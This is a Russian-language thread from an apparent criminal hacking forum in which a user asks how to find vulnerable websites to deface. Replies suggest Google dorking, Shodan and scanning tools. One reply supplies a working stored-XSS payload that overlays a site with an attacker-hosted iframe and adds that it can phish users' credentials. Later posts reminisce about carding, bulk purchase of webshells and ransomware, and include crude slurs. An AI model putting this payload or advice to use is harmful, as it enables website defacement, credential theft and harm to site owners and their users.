Я ищу какое-нибудь руководство, рекомендации, сканеры или что-то еще, что поможет мне улучшить поиск веб-уязвимости.
-
XSS.stack #1 – первый литературный журнал от юзеров форума
Какой метод вы рекомендуете для поиска уязвимых веб-сайтов для дефейса?
- Автор темы Nothing
- Дата начала
https://xss.pro/forums/126/?prefix_id=9
раздел софта не причём, нужно использовать кнопку "ПОИСК" где можно найти разные методы а так самый простой метод массово находить уязвимые сайты – гугл доркинг
внимательно прочти первый пост.
Раздел софта к сканерам не относиться?
"Какой метод вы рекомендуете для поиска уязвимых веб-сайтов" заголовок
"...сканеры или что-то еще, что поможет мне улучшить поиск веб-уязвимости." сам пост
отличия есть
да, извините ошибся
Сначала нужно разобраться что приводит к дефейсу сайта, какие вулны, тот же html-inkection....посмотреть парочку примеров, сделать вывод...написать дорку и вперёд.
Find the vulnerability through Shodan
Вы можете использовать автоматизированные инструменты взлома, такие как Metasploit, Nmap или Nessus.
Имхо чаще всего stored xss по которым через js инжектят фрейм другой страницы из сайта.
Если заметили stored-xss можете попробывать вставить этот код:
beefproject заменяете сайтом в котором лежит ваш дефейс-пейдж.
UPD:так-же можно использовать для фишинга пользователей с целью получения их кредов в веб-приложении
Если заметили stored-xss можете попробывать вставить этот код:
Код:
<script>document.body.innerHTML='<iframe src="https://beefproject.com/" style="position: fixed; top: 0; left: 0; bottom: 0; right: 0; width: 100%; height: 100%; border: none;"></iframe>'</script>UPD:так-же можно использовать для фишинга пользователей с целью получения их кредов в веб-приложении
Дефейс в 2023 году 
Это не то, что в 2007-м, а еще раньше считалось нубством и зашкваром.
На самом деле, странное желание. Это как вскрыть чужую квартиру, насрать там кучу посреди комнаты и уйти. Автор, на всякий случай, сейчас не середина нулевых. За взлом сайтов реально сажают. И вот ты зачем-то хочешь совершить уголовно наказуемое преступление и не получить с этого никакого профита, а просто так.
Это не то, что в 2007-м, а еще раньше считалось нубством и зашкваром.
На самом деле, странное желание. Это как вскрыть чужую квартиру, насрать там кучу посреди комнаты и уйти. Автор, на всякий случай, сейчас не середина нулевых. За взлом сайтов реально сажают. И вот ты зачем-то хочешь совершить уголовно наказуемое преступление и не получить с этого никакого профита, а просто так.
Ахахаахахах самый орный пример который я когда-либо слышал)))))Дефейс в 2023 году
Это не то, что в 2007-м, а еще раньше считалось нубством и зашкваром.
На самом деле, странное желание. Это как вскрыть чужую квартиру, насрать там кучу посреди комнаты и уйти. Автор, на всякий случай, сейчас не середина нулевых. За взлом сайтов реально сажают. И вот ты зачем-то хочешь совершить уголовно наказуемое преступление и не получить с этого никакого профита, а просто так.
Мой первый и последний дефейс был в 2004-2005 ггДефейс в 2023 году
Это не то, что в 2007-м, а еще раньше считалось нубством и зашкваром.
На самом деле, странное желание. Это как вскрыть чужую квартиру, насрать там кучу посреди комнаты и уйти. Автор, на всякий случай, сейчас не середина нулевых. За взлом сайтов реально сажают. И вот ты зачем-то хочешь совершить уголовно наказуемое преступление и не получить с этого никакого профита, а просто так.
В то время это был один из способов самовыражения, некая попытка выделиться чтоли, заявить о себе, типа H4cK3D bY C0o1 T34m (оправданная бушующими гормонами, юношеским максимализмом, респектами от пацаноф со двора + как раз в духе того времени ))) Выглядело же это всё максимально ублюдочно и позорно. Что может двигать людьми на дефейс в 2023 (20 лет спустя)? Я даже в 2007 не помню какой то волны, люди уже в коммерц ушли с головой. Сейчас это может быть тоже некий пиар ход (таким же конченным способом), дабы донести нечто до массы незаинтересованных в этом людей максимальным кол-вом дефейсов говносайтов. Например ТС - представитель киллнетов (или очередной крутейшей тимы анонимусов) и надо пиариться, либо заявка от ципсо пришла с очередной хуетой по повесточке (скорее всего нечто подобное). Легче тогда уже закупить говношеллов по 0.2-0.3-0.5 бачей на сотку и через шелл манагер какой нибудь проставить везде свой невьебательски важный посыл мировой общественности.
Последнее редактирование:
Епт, ты забыл в чем была мякотка тогда: чья тима кручеМой первый и последний дефейс был в 2004-2005 гг
Круче тот, у кого больше дефейсов на void.ru Но не дефейсами едиными, вспомни, сколько было езинов: http://web.archive.org/web/20070202122444/http://anonymous.ru:80/index.php?p=ezineИ никаких инфоцыган на тот момент, блядь! Ну не считая Арви Тхе Хэккер, над которым все смеялись и даже пару раз били ебало в реале, лол.
Хуево в те времена монетизировался хак (даже нормального уровня). Поэтому все прокачивали свои умения, но по сути не зарабатывали нихуя. Единственный вариант был идти в кробинг на тот момент, Скрипт активно тогда начал мутить с процессингами, как и еще несколько деятелей. Вся массовая монетизация пошла с варез-тим, кто смог выйти на бурж спайварки и клеить их к крякам. Потом наш сдувшийся адалт решил повернуться лицом к "серым" (на тот момент) темам и появились варианты по процессингу. Через несколько лет постепенно стало перепадать и нам.
Ну а дальше еще несколько лет и все дружно прыгнули из киддисов в элитку, так как трафик с шеллов был самый сладкий для новой волны скамерсантов с вендорснейма, лол. Кто не хотел работать с кроберами, нормально поднимал со спамерами на хакнутых базах. Когда же пришел рэнсом, успешная элитка превратилась в клуб миллионеров, но пошла ебанная шумиха, аресты, игры с ФСБ и куча прочего говна, что и вспоминать не хочется. Так и живем.
Не забыл, это не забудешь ))) Только тогда не на войде понтовался, а на ачате и ныне почившем whb. И цели что то монетизировать вообще не стояло (изначально, да...)
Всплакнул ='(
Последнее редактирование:
Да и в нулевые сажали... как пример, отсидел, хакер - xblpДефейс в 2023 году
Это не то, что в 2007-м, а еще раньше считалось нубством и зашкваром.
На самом деле, странное желание. Это как вскрыть чужую квартиру, насрать там кучу посреди комнаты и уйти. Автор, на всякий случай, сейчас не середина нулевых. За взлом сайтов реально сажают. И вот ты зачем-то хочешь совершить уголовно наказуемое преступление и не получить с этого никакого профита, а просто так.
Копаясь в шеллах, порой натыкаешься на отголоски тех времен. Обычно это иранские и турецкие хакеры) Подозреваю, не самого большого возраста.
Стиль нулевых, что характерно, тоже выдержан у них до сих пор.
Тут можно переделать старый анекдот на новый лад. ТС, дефейсом занимаются или турки, или гомосексуалисты. Но что-то я не вижу фески на твоей голове.
Стиль нулевых, что характерно, тоже выдержан у них до сих пор.
Тут можно переделать старый анекдот на новый лад. ТС, дефейсом занимаются или турки, или гомосексуалисты. Но что-то я не вижу фески на твоей голове.
Я тут еще выпал, когда увидел, что они юзают наши шеллы из тех далеких времен, например webshell/c99.php Тристрама
Сам Тристрам уже успел вырасти, пару раз извиниться и превратиться в большого белого веб-девелопера, а его детище так и продолжает гулять по сайтам, лол.